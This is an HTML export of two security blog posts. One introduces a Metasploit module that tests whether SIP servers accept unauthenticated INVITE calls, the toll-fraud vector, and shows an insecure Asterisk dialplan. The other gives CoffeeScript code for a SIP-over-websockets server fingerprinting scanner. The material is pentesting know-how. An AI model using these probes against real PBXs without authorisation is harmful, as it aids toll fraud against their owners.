Some days ago my friend <a href="https://twitter.com/pepeluxx" target="_blank">@pepeluxx</a> wrote <a href="http://blog.pepelux.org/2013/01/05/asterisk-%E2%80%93-invite-attack-ii/" target="_blank">another post</a> about INVITE attacks. He spoke about a <a href="https://twitter.com/sinologicnet" target="_blank">@sinologic</a> <a href="http://www.sinologic.net/blog/2010-04/test-sip-sinologic/" target="_blank">project</a> which allows to everybody passing some security tests to SIP servers. Furthermore he also published a perl script to do the same task. So I implemented it on Metasploit because I think It could be really useful during a pentesting. It’s interesting because these attacks are really dangerous, normally, attackers try to call to expensive locations. This target numbers often have special charges and they make money with this. Here there are two well known examples:</div>
<div style="text-align: start;">
<br /></div>
<ul style="text-align: start;">
<li><a href="http://blog.sipvicious.org/2010/12/11-million-euro-loss-in-voip-fraud-and.html">http://blog.sipvicious.org/2010/12/11-million-euro-loss-in-voip-fraud-and.html</a></li>
<li><a href="http://snapvoip.blogspot.com.es/2009/02/calls-to-cuba-and-voip-attacks.html">http://snapvoip.blogspot.com.es/2009/02/calls-to-cuba-and-voip-attacks.html</a></li>
</ul>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
I’m not going to deep in this vector because of being a well known (and old!!) one. Basically the attacker tries to make a call using a misconfigured PBX. This is allowed because <a href="http://www.ietf.org/rfc/rfc3261.txt" target="_blank">SIP RFC</a> says that an extension has not to be registered to be able to make a call, only to receive it. Really most SIP servers implement authentication both in registering and calling process (and even to hang up a call), this is useful in eavesdropping scenarios in order to avoid <a href="http://www.youtube.com/watch?v=Rq-UULauLzc" target="_blank">SIP Teardown</a> (BYE) attacks. But only a few systems have this configuration enabled by default, most of them use authentication only to register. In example, for Asterisk we should change <i>“allowguest=no”</i> in <i>"sip.conf"</i> file to ask for authentication in each call (INVITE). Apart from this, sysadmins should be also very carefully defining the dialplan to be secure. A common example of what <b>not to do</b> is the next one, in where outbound (to <a href="http://en.wikipedia.org/wiki/Public_switched_telephone_network" target="_blank">PSTN</a>) calls context is included in default one:</div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
(<b>sip.conf</b> file)</div>
<div style="text-align: start;">
<i>[general]</i></div>
<div style="text-align: start;">
<i>context=default</i></div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
(<b>extensions.conf</b> file)</div>
<div style="text-align: start;">
<i>[default]</i></div>
<div style="text-align: start;">
<i>include => outbound</i></div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
I committed the module to <a href="https://github.com/jesusprubio/metasploit-sip" target="_blank">my Github project</a>, it only implements a SIP INVITE request where the user can provide next parameters:</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh21iUq8ZixRl63x2DHhbbqlpG1FaDtOfmfggoXxPaAhnP5yoFQEmeYvEROCxCA0cHRUuQd5rK-JDw5FO5XWF6LV0nd9kA6ucZO7B7cXubI08qEQxeRNMyPh0pK_aSlCcDuwKDgOzYLryw/s1600/1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh21iUq8ZixRl63x2DHhbbqlpG1FaDtOfmfggoXxPaAhnP5yoFQEmeYvEROCxCA0cHRUuQd5rK-JDw5FO5XWF6LV0nd9kA6ucZO7B7cXubI08qEQxeRNMyPh0pK_aSlCcDuwKDgOzYLryw/s400/1.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 13px;">Module parameters</td></tr>
</tbody></table>
<div style="text-align: start;">
<br />
You should try to call to a common phone number (you can see it in last picture) and with an extension because servers normally work in a different way. The code simply sends an INVITE request with provided options and then it parses the response. If it is a <i>“Trying”</i> you could be in a problem man. ;)</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfOgiBkvRfNl-c2_CYNaSL7bosUmjwwH0TpzsbfndjS2nIae6dQEZShgaYlxYPN1w_vuZoK2sWAHjVSvmPQwj6V-BQ5pHjXNlcKlRnedQzhm6mXlWtkUJBBU64jQHNiY5kBZSwlFIaMHk/s400/15.png" width="400" /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqRDpCXep66MF60XoWLodLhmgH5xG4mUhI4DKUhihoIkc57ELqPnjROSaD-DCEXPD3nOVApudkJfqVon8CySWbanmgNlOu6UztMzhkGrL6QCzPXsPY9WNkFFpIi8cw-Xt4MYC68MQ4sN0/s1600/3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqRDpCXep66MF60XoWLodLhmgH5xG4mUhI4DKUhihoIkc57ELqPnjROSaD-DCEXPD3nOVApudkJfqVon8CySWbanmgNlOu6UztMzhkGrL6QCzPXsPY9WNkFFpIi8cw-Xt4MYC68MQ4sN0/s400/3.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 13px;">Possible insecure system</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRdDLhMifRpVAjhZ3RfouKsJz_hTGSnS66TTfC9drQy5YPjBSPHbQJR1JiOPJdbrNYOpdS41_hkkSaKKjBiwrMy8z3IjJNvPnc5oNKN81BOCm379RuaW-5t3QJMWsrNyYlyeWmmZ1V2Yo/s1600/2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRdDLhMifRpVAjhZ3RfouKsJz_hTGSnS66TTfC9drQy5YPjBSPHbQJR1JiOPJdbrNYOpdS41_hkkSaKKjBiwrMy8z3IjJNvPnc5oNKN81BOCm379RuaW-5t3QJMWsrNyYlyeWmmZ1V2Yo/s400/2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Possible insecure system</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaeyMkqVNu8miVw1Bj9k5MC3cX4WCOmwJcL6dpFTZGNsp_igKNS_zeLOsi06l4rdr94PWPT4KLikOBkKSsfp8wFMoTxCFY9W_VSKkFBTLqflpch6Em_OtBPnwa2c8tyMLu2Hjur7kaDAU/s1600/26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaeyMkqVNu8miVw1Bj9k5MC3cX4WCOmwJcL6dpFTZGNsp_igKNS_zeLOsi06l4rdr94PWPT4KLikOBkKSsfp8wFMoTxCFY9W_VSKkFBTLqflpch6Em_OtBPnwa2c8tyMLu2Hjur7kaDAU/s400/26.png" width="400" /></a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZHp6oi2U-BY5bejT10SFCMIc1q74R2bg3RzU_NEebfheuj3fy-2B9Uq_gL_hIy1qheh3VckCypKulf-erybLJSxZVhFfneB9mgszxBXoUk9HK8gCXvnhyr6jGiZR8WNoRmHXt25BtK0w/s1600/Captura+de+pantalla+de+2013-01-19+13:50:09.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZHp6oi2U-BY5bejT10SFCMIc1q74R2bg3RzU_NEebfheuj3fy-2B9Uq_gL_hIy1qheh3VckCypKulf-erybLJSxZVhFfneB9mgszxBXoUk9HK8gCXvnhyr6jGiZR8WNoRmHXt25BtK0w/s400/Captura+de+pantalla+de+2013-01-19+13:50:09.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Secure system to this vector</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
These are the links to both UDP and TCP version of the tool. I would like to remember that Metasploit modules which support TCP also support TLS. You can change the version of the protocol and another optional parameters with command <i>“show advanced”</i>.<br />
<ul>
<li><a href="https://github.com/jesusprubio/metasploit-sip/blob/master/sipinvite.rb" target="_blank">UDP</a></li>
<li><a href="https://github.com/jesusprubio/metasploit-sip/blob/master/sipinvite_tcp.rb" target="_blank">TCP</a></li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBouJAkxKus8cq5FQy8QK32XGwLsCr0vKHsBvX8yt9dWT_3xAOIcG99q2wfNd2cP0gRM1-sZMJAjZpwlFaTu66cI0KB7WcBfaStbqB8WJRTKjht9vayQcdXQ6fIn1MWhdEigIt_-MaeAI/s1600/Captura+de+pantalla+de+2013-01-19+14:33:45.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBouJAkxKus8cq5FQy8QK32XGwLsCr0vKHsBvX8yt9dWT_3xAOIcG99q2wfNd2cP0gRM1-sZMJAjZpwlFaTu66cI0KB7WcBfaStbqB8WJRTKjht9vayQcdXQ6fIn1MWhdEigIt_-MaeAI/s400/Captura+de+pantalla+de+2013-01-19+14:33:45.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Advanced options</td></tr>
</tbody></table>
<br />
Finally I want to say that last days I was reviewing my SIP Metasploit modules trying to add some more features (like SIP proxy support) and I found that they are a mess. There is a lot of repeated code and they are complex to maintain. So, after speaking with some Metasploit guys on irc channel, I’m going to write a new SIP Proto (<i>"lib/rex/proto/sip.rb"</i>) class and a <a href="http://www.offensive-security.com/metasploit-unleashed/Mixins_and_Plugins" target="_blank">Mixin</a> (<i>"lib/msf/core/auxiliary/sip.rb"</i>) which uses it. Once solved this I’m going to add all SIP modules I have developed to official Metasploit distribution.<br />
<br />
Ref: <a href="http://www.sinologic.net/blog/2009-02/la-voip-mal-configurada-llama-a-cuba/">http://www.sinologic.net/blog/2009-02/la-voip-mal-configurada-llama-a-cuba/</a>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-60757398217183492382013-01-16T09:15:00.000+01:002013-02-01T15:51:37.217+01:00Playing with QoffeeSIP: SIP over websocket scanner<span id="internal-source-marker_0.8878092772793025" style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Some weeks ago we published </span><a href="http://qoffeesip.quobis.com/" target="_blank"><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">QoffeeSIP</span></a><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">, the Javascript </span><a href="https://datatracker.ietf.org/doc/draft-ietf-sipcore-sip-websocket/" target="_blank"><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">SIP over websockets</span></a><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> stack which we use to develop our WebRTC products in </span><a href="http://www.quobis.com/" target="_blank"><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Quobis</span></a><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">. An example is </span><a href="http://www.quobis.com/index.php?option=com_content&task=view&id=19&Itemid=30" target="_blank"><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">IdentityCall</span></a><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">, a system designed to provide call authentication in traditional VoIP and IMS environments. Now it achieves the same goal in WebRTC ones, interconnecting them at the same time with </span><a href="http://en.wikipedia.org/wiki/Public_switched_telephone_network" target="_blank"><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">PSTN</span></a><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> network.</span><br /><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Today I’m showing a different case of use that those proposed in </span><a href="https://quobis.atlassian.net/wiki/display/QoffeeSIP/Examples+of+use" target="_blank"><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">examples</span></a><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> (the </span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"simplest-example"</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> and a </span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"webphone"</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">). I’m going to write a simple (but for sure the first one in the world ;) </span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">SIP over websockets server scanner</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">. It should send a valid SIP (over websockets) petition, parse the interesting info from the response ( i.e. </span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"User-Agent"</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">) and print it. I’m using the simplest example as basis, here there are the description of the changes I made on the code:</span><br /><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- In this case no HTML video tags are provided to the constructor. The reason is that we are only using websocket features of the stack, not WebRTC ones.</span><br /><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- Some stuff deleted from the interface in order to ask only for needed parameters (ip address, port and optionally the extension used to made the registration).</span><br /><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- Media parts were also deleted from </span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">script.coffee</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> file, which defines the logic of the app.</span><br /><span style="vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 15px;">- Obviously we need to change this logic so I added some code at the end. </span>In this case we are saying that when states 2 (</span><span style="background-color: white; vertical-align: baseline; white-space: pre-wrap;">Registering after challenge) or 3 (Registered) are reached, received message is going to be parsed.</span><span style="vertical-align: baseline; white-space: pre-wrap;"> </span><br /><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- Then strings </span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"User-Agent"</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">, </span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"Server"</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"Organization"</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> are parsed from this response and printed. Really we are getting it from an object with the property </span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"frame"</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">.</span><br /><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- Finally, makefile is modified in order to generate the output with the correct name. </span></span><br />
<br />
<b>script.coffee</b>
<br />
<pre class="brush:ruby">#<span style="white-space: pre-wrap;">#</span><pre style="white-space: pre-wrap; word-wrap: break-word;"># Copyright (C) Quobis
# Project site: https://github.com/Quobis/QoffeeSIP
#
# Licensed under GNU-LGPL-3.0-or-later (http://www.gnu.org/licenses/lgpl-3.0.html)
##
# On document ready...
$ ->
# Avoid page "reloading" on submit.
$("form").submit (e) ->
e.preventDefault()
false
# Declaration of api.
api = null
$("#init").submit =>
options =
server: {ip: $("#server-ip").val(), port: $("#server-port").val()}
onopen: =>
api.register "qoffeesip", "anonymous"
api = new API options
api.on "new-state", (state, message) ->
switch state
when 2,3
userAgentRE = /User-Agent:(.*)/i
serverRE = /Server:(.*)/i
organizationRE = /Organization:(.*)/i
matchUa = userAgentRE.exec message.frame
matchServer = serverRE.exec message.frame
matchOrganization = organizationRE.exec message.frame
output = matchUa or matchServer or matchOrganization
$("#output").text(output[0])</pre>
</pre>
<br />
<b>index.jade</b>
<br />
<pre class="brush:html"><span style="white-space: pre-wrap;">//-</span><pre style="white-space: pre-wrap; word-wrap: break-word;">//- @source: https://github.com/Quobis/QoffeeSIP
//- Copyright (C) Quobis
//- Licensed under GNU-LGPL-3.0-or-later (http://www.gnu.org/licenses/lgpl-3.0.html)
//-
!!!
head
title SIP over websockets scanner
script(src="lib/jquery-1.8.0.min.js")
script(src="lib/spine.js")
script(src="lib/underscore.js")
script(src="lib/qoffeesip.js")
script(src="script.js")
body
form(id="init")
input(id="server-ip", type="text", placeholder="Server IP", required)
input(id="server-port", type="number", placeholder="Port", required)
input(type="submit", value="Scan")
</pre>
div(id="output")
</pre>
<div style="text-align: center;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div style="text-align: left;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">I have committed this example to </span><a href="https://quobis.atlassian.net/wiki/display/QoffeeSIP/Examples+of+use" style="font-family: inherit;" target="_blank"><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">QoffeeSIP examples of use</span></a><span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">, so you can download and use it as explained is </span><a href="https://quobis.atlassian.net/wiki/display/QoffeeSIP/Quick+start+guide" style="font-family: inherit;" target="_blank"><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">QuickStart guide</span></a><span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> of the project. The command </span><span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"make build"</span><span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> (or simply <i>"make"</i>) is going to put the output files in </span><span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"dist"</span><span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> folder. Then you only have to move them to an HTTP server, like Apache. You could follow next steps:</span></div>
</div>
<span id="internal-source-marker_0.8878092772793025" style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- Confirm you have installed coffeeScript and Jade in your system, if not you can use npm to install them (</span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"coffee-script"</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"jade"</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">).</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span><br />
<div>
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- Download the examples using git.</span></div>
<div>
<div>
<i><span style="font-family: inherit;"><span style="vertical-align: baseline; white-space: pre-wrap;">git clone</span></span></i><span style="white-space: pre-wrap;"><i> https://github.com/Quobis/QoffeeSIP.git</i></span><br />
<i><span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">cd qoffeesip/examples/sipwebsockets-scanner</span></i></div>
<div>
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- Generate the files to distribute it.</span></span><br />
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;"><i>make</i></span></div>
<div>
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- Copy them to your Apache server:</span></span><br />
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;"><i>sudo cp -R dist/* /var/www</i></span><br />
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span><br /></span>
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Here there are a few shoots:</span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihEtbVErP3-fwgjTCmH1vD9t3r_lDWVQanqAwUSa1eEwVhpF4_v3HSb4yLpU0cf8GfzLaPc0w8UaEHAXrKFRV66TJJ2VGNe4Iym1eSf-KFvnXOQ8t1hToJnxgxekJCNDwTfjiUNKLG3Vo/s1600/0.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihEtbVErP3-fwgjTCmH1vD9t3r_lDWVQanqAwUSa1eEwVhpF4_v3HSb4yLpU0cf8GfzLaPc0w8UaEHAXrKFRV66TJJ2VGNe4Iym1eSf-KFvnXOQ8t1hToJnxgxekJCNDwTfjiUNKLG3Vo/s400/0.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="separator" style="clear: both; font-size: medium;">
<span style="font-family: inherit; white-space: pre-wrap;"><span style="font-size: x-small;">Scanner setup</span></span></div>
</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"></span></div>
<div>
<div style="text-align: center;">
<div style="display: inline !important;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEskntWKkioTOXNo-HDH6F6VHMSgJ2yKu0wDAm89EiAKGHD5ikeFylnWdu-VZgi6KxieBCwknv3p1ALM9vFPlz8GHJ-XLTbsR_x9CMQji9cmzuyuiic3TqaX_gRRvH7aprK1G3ZrA4kuM/s1600/Captura+de+pantalla+de+2013-01-16+01:35:37.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEskntWKkioTOXNo-HDH6F6VHMSgJ2yKu0wDAm89EiAKGHD5ikeFylnWdu-VZgi6KxieBCwknv3p1ALM9vFPlz8GHJ-XLTbsR_x9CMQji9cmzuyuiic3TqaX_gRRvH7aprK1G3ZrA4kuM/s400/Captura+de+pantalla+de+2013-01-16+01:35:37.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">S</span><span style="font-family: inherit; font-size: x-small; vertical-align: baseline; white-space: pre-wrap;">canning IdentityCall server</span></td></tr>
</tbody></table>
</div>
</div>
<span style="font-family: inherit;"><span style="font-size: x-small;">
</span>
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9JB8BsgudOAO0U_UuaMpnSpRI0YO1uzpNu6OnjMQs-ZvwDIUVlxskciCSPq4B5lfP8eB6U2MJkHSYXuYNgH2ub_O06OcWROY3eoxUAPHVmihCDde1q-MwaqOosy_pYiy49SQfzpvorv8/s1600/Captura+de+pantalla+de+2013-01-16+01%253A36%253A00.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9JB8BsgudOAO0U_UuaMpnSpRI0YO1uzpNu6OnjMQs-ZvwDIUVlxskciCSPq4B5lfP8eB6U2MJkHSYXuYNgH2ub_O06OcWROY3eoxUAPHVmihCDde1q-MwaqOosy_pYiy49SQfzpvorv8/s400/Captura+de+pantalla+de+2013-01-16+01%253A36%253A00.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: x-small; white-space: pre-wrap;">Scanning </span><span style="font-family: inherit; font-size: x-small; vertical-align: baseline; white-space: pre-wrap;">Kamailio</span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; font-size: x-small;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
<span style="font-size: 15px; white-space: pre-wrap;">In a real tool, for best results, we should make some improvements like these:</span></div>
<div style="text-align: left;">
<span style="font-family: inherit; font-size: 15px; white-space: pre-wrap;">- Use OPTIONS packets because of being more accurate for this target.</span></div>
<br />
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- Add support to ranges of ip addresses.</span><br />
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- Avoid asking for approval to use webcam and/or micro. Really it is not used but it’s a limitation of the stack. We decided to do this request during registering instead of during a call because of usability issues.</span><br />
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- Use </span><a href="http://twitter.github.com/bootstrap/" target="_blank"><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Bootstrap</span></a><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> to get a more friendly interface.</span></span><br />
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span><br /></span>
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">But this is only a proof of concept so I think it is good enough for now. The target of this post is to show a different way of playing with the stack. Anyway I’m going to add support for websockets to my </span><a href="https://github.com/jesusprubio/metasploit-sip" target="_blank"><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">SIP Metasploit modules</span></a><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> in any moment if you are interested in more professional tools.</span></span><br />
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In the same way, if you were interested in a more complex application you can visit </span><a href="http://talksetup.quobis.com/" target="_blank"><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">the online demo</span></a><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> which implements </span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">"webphone" </span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">example of use. </span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">So you can play with it too, if you need help you can always open an issue on <a href="https://github.com/Quobis/QoffeeSIP" target="_blank">Github</a></span><span style="color: #1155cc; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><a href="https://github.com/Quobis/QoffeeSIP" target="_blank"> repository</a></span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">.</span></span><br />
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOx_DwcF3g6Zrz_zmQznF6zIG6bQNYLVuE-jVgaD1Va21gSyZluI1KpPzHI1QJ7soEbAkq8vL0w-1Uia5hiOEHf0ms7vYvoUz_TuW5mzoiMrsK-OPw9lnr8Pd4XdR90nha4Pqe3UaKSuY/s1600/3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOx_DwcF3g6Zrz_zmQznF6zIG6bQNYLVuE-jVgaD1Va21gSyZluI1KpPzHI1QJ7soEbAkq8vL0w-1Uia5hiOEHf0ms7vYvoUz_TuW5mzoiMrsK-OPw9lnr8Pd4XdR90nha4Pqe3UaKSuY/s400/3.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small; white-space: pre-wrap;">QoffeeSIP demo</span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"></span></div>
<b style="font-weight: normal;">
</b></div>
</div>
